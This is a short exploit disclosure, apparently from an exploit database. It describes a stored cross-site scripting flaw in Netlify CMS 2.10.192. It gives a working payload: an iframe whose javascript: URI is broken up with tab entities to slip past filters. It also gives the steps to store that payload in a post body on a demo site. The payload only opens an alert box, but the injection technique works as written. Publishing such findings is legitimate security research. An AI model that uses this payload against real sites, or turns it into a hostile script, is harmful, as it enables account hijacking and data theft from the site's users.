Share
## https://sploitus.com/exploit?id=PACKETSTORM:173367
# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://decapcms.org/docs/intro/  
# Software Link: https://github.com/decaporg/decap-cms  
# Version: 2.10.192  
# Tested on: https://cms-demo.netlify.com  
  
  
Description:  
  
1. Go to new post and write body field your payload:  
  
https://cms-demo.netlify.com/#/collections/posts  
  
Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>  
  
2. After save it XSS payload will executed and see alert box